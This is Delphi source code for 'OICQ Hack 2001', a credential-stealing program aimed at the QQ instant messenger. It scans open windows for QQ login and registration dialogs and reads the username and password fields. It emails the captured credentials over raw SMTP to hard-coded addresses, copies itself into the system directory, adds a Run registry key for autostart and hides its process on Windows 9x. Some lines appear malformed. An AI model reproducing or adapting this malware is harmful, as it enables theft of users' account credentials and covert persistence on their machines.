{ ****************** OICQ Hack 2001*********** * * 2001 5.22 ver 1.1 Modify for OICQ2000b 0230 * 2001 5.25 ver 1.2 Modify for QQ2000b 0430 * Last updated: 2001.5.25 * Author :njhhack * HackSoft Research Lab. * Copyright(C) 2001 Allrigths Reserved. * * ********************************************** } //---------------下面是oicqhack.dpr工程文件 program oicqhack; uses Windows, Messages, mainunit in 'mainunit.pas'; {$R *.RES} var wClass: TWndClass; // class struct for main window Msg: TMSG; // message struct procedure ShutDown; begin UnRegisterClass(classname,hInst); ExitProcess(hInst); //end program end; function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:=DefWindowProc(hWnd,Msg,wParam,lParam); case Msg of WM_CREATE: wincreate; WM_TIMER: ontimer1; WM_DESTROY: ShutDown; end; end; begin //如果旧版本已运行,则停止旧版程序,只运行当前新版程序 hmain:=Findwindow('HackSoft-Oicq-Password-Recoder','OICQ 密码记录器2'); if hmain<>0 then sendmessage(lp,wm_destroy,0,0); hInst:=GetModuleHandle(nil); // get the application instance classname:='HackSoft-Oicq-Password-Recoder'; with wClass do begin Style:= CS_PARENTDC; hIcon:= LoadIcon(hInst,'MAINICON'); lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_BTNFACE+1; lpszClassName:= classname; hCursor:= LoadCursor(0,IDC_ARROW); end; RegisterClass(wClass); hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,'OICQ 密码记录器3',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil); //建立一个新的定时器,用来定时扫描系统中的窗口 newtime:=SetTimer(hmain,0,300,nil); //建立消息循环 while(GetMessage(Msg,hmain,0,0))do begin TranslateMessage(Msg); DispatchMessage(Msg); end; //结束定时器 killtimer(hmain,newtime); end. //-------下面是mainunit.pas单元文件 unit mainunit; interface uses Windows, Messages, SysUtils, Classes, winsock, registry; const CRLF=#13#10; var spy:string; hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer; his:array[0..100] of integer; syspath:array[0..200] of integer; regservice:function(uThread:integer;uType:integer):Integer;stdcall; libhandle:thandle; classname:array[0..100] of char; items:array[0..4] of string; err:integer; wsadata:twsadata; fsocket,fport,step:integer; SockAddrIn:TSockAddrIn; hackmail,email,newpass,fhost,s1,password:string; sbuf:array[0..1024] of char; procedure winCreate; procedure OnTimer1; implementation //修改注册表让程序自启动 procedure autorun; var reg:tregistry; begin reg:=tregistry.create; reg.rootkey:=HKEY_LOCAL_MACHINE; reg.openkey('SOFTWARE/Microsoft/Windows/CurrentVersion/Run',true); reg.WriteString('oicqpass',spy+'OICQPASS.EXE'); reg.closekey; reg.free; end; //下面是个发信的子过程,取得密码后发回getoicq@21cn.com邮箱 procedure MailSend; begin err:=recv(FSocket,sbuf,400,0); s1:=strpas(sbuf); inc(step); case step of 1:s1:='HELO smtp.hacker.com'+CRLF; 2:s1:='MAIL FROM: <getoicq@21cn.com>'+CRLF; 3:s1:='RCPT TO: <'+email+'>'+CRLF; 4:s1:='DATA'+CRLF; 5:s1:='From:"Oicq Hack"<www.hacker.com>'+CRLF +'To:"getoicq"<www.password.com>'+CRLF +'Subject:QQ2001 Password come.'+CRLF +CRLF +newpass+CRLF +'.'+CRLF; 6:s1:='QUIT'+CRLF; else step:=0; end; strcopy(sbuf,pchar(s1)); err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE); end; //发信主过程 procedure SendPass; begin err:=WSAStartup($0101,WSAData); FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP); //利用 smtp.21cn.com 进行发信 fhost:='202.104.32.230'; fport:=25; SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost)); SockAddrIn.sin_family := PF_INET; SockAddrIn.sin_port :=htons(Fport); err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn)); step:=0; repeat MailSend; until step=0; err:=closesocket(FSocket); err:=WSACleanup; end; //窗口枚举函数 function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall; var hw,hwold,hs,wlong,hup,i:integer; sbuf,sb3,sb2:array[0..256] of char; sb1:string; begin hwold:=GetParent(hwnd); wlong:=GetWindowLong(hwnd,GWL_STYLE); if (wlong and ES_PASSWORD)<>0 then begin //检查是否OICQ登陆 hup:=GetParent(hwnd); sendmessage(hup,wm_gettext,100,integer(@sbuf)); strpcopy(sb2,'OICQ 注册向导'); strpcopy(sb3,'QQ 注册向导'); if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then begin old:=GetParent(hup); old:=GetParent(old); old:=GetParent(old); start:=0; count:=1; //items.clear; //跳过两个窗口 hwnd:=Getwindow(hwnd,GW_HWNDFIRST); hwnd:=Getwindow(hwnd,GW_HWNDNEXT); //取得用户名 hwnd:=Getwindow(hwnd,GW_HWNDNEXT); hw:=GetWindowTextLength(hwnd); hs:=integer(@sbuf); sendmessage(hwnd,wm_gettext,100,hs); items[0]:='用户名:'+strpas(sbuf); //取得密码 hwnd:=Getwindow(hwnd,GW_HWNDNEXT); hw:=GetWindowTextLength(hwnd); hs:=integer(@sbuf); sendmessage(hwnd,wm_gettext,100,hs); items[1]:='密码:'+strpas(sbuf); end; strpcopy(sb2,'OICQ用户登录'); strpcopy(sb3,'QQ用户登录'); if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then begin old:=GetParent(hup); old:=GetParent(old); start:=0; count:=1; //items.clear; //取得用户名 hwnd:=Getwindow(hwnd,GW_HWNDFIRST); hw:=GetWindowTextLength(hwnd); hs:=integer(@sbuf); sendmessage(hwnd,wm_gettext,100,hs); items[0]:='用户名:'+strpas(sbuf); //取得密码 hwnd:=Getwindow(hwnd,GW_HWNDNEXT); hw:=GetWindowTextLength(hwnd); hs:=integer(@sbuf); sendmessage(hwnd,wm_gettext,100,hs); items[1]:='密码:'+strpas(sbuf); end; end; //检查是否在线 hw:=GetWindowTextLength(hwnd); hs:=integer(@sbuf); sendmessage(hwnd,wm_gettext,100,hs); strpcopy(sb2,'在线'); strpcopy(sb3,'隐身'); if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then begin if hwold=old then begin if olde<>old then begin if strcomp(sbuf,sb2)=0 then items[2]:='登录成功:在线' else items[2]:='登录成功:隐身'; items[3]:=' '; //密码发回我的邮箱getoicq@21cn.com newpass:=format('%s %s %s %s',[items[0],items[1],items[2],items[3],items[4]); // hackmail:=email; sendpass; email:='mf001@etang.com'; sendpass; email:=hackmail; //密码存盘到oicqpass.dll中 { if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll') else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite); if fileexists(spy+'oicqpass.dll')=false then fhand:=filecreate(spy+'oicqpass.dll') else fhand:=fileopen(spy+'oicqpass.dll',fmOpenWrite); fileseek(fhand,0,2); strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10); filewrite(fhand,sbuf,strlen(sbuf)); fileclose(fhand); } end; olde:=old; end; end; result:=true; end; 定时器响应函数 procedure OnTimer1; begin lp:=0; EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp); end; //窗口创建响应函数 procedure winCreate; var wlong:integer; s1:string; s2,s3,sbuf:array[0..300] of char; i:integer; osver:TOSVERSIONINFO; tmp:tmemorystream; begin //取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能 osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO); if GetVersionEx(osver)=true then begin if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then begin LibHandle:=LoadLibrary('kernel32.dll'); if LibHandle<>0 then begin @regservice:=GetProcAddress(LibHandle, 'RegisterServiceProcess'); regservice(0,1);//1=hide,0=show; FreeLibrary(LibHandle); end; end; end; max:=0; count:=0; 将程序复制到系统目录 s1:=ParamStr(0); for i:=0 to length(s1) do s2:=s1[i+1]; GetSystemDirectory(@syspath,MAX_PATH); spy:=strpas(@syspath)+'/'; s1:=spy+'oicqhack.exe'; for i:=0 to length(s1) do s3:=s1[i+1]; copyfile(s2,s3,false); //从email.txt中找到目标e-mail信箱 if fileexists('c:/email.txt')=false then begin email:='getoicq@21cn.com'; end else begin tmp:=tmemorystream.create;; tmp.loadfromfile('c:/email.txt'); count:=tmp.size; // strcopy(sbuf,pchar('')); tmp.read(sbuf,count); tmp.free; email:=''; for step:=0 to count-1 do email:=email+sbuf[step]; strcopy(sbuf,pchar(email)); // messagebox(0,sbuf,'',0); end; count:=0; step:=0; //修改注册表使程序自启动 autorun; end; end. / --------倪建华--------------- HackSoft Research Lab. Copyright(C) 2001 Alrights reserved.
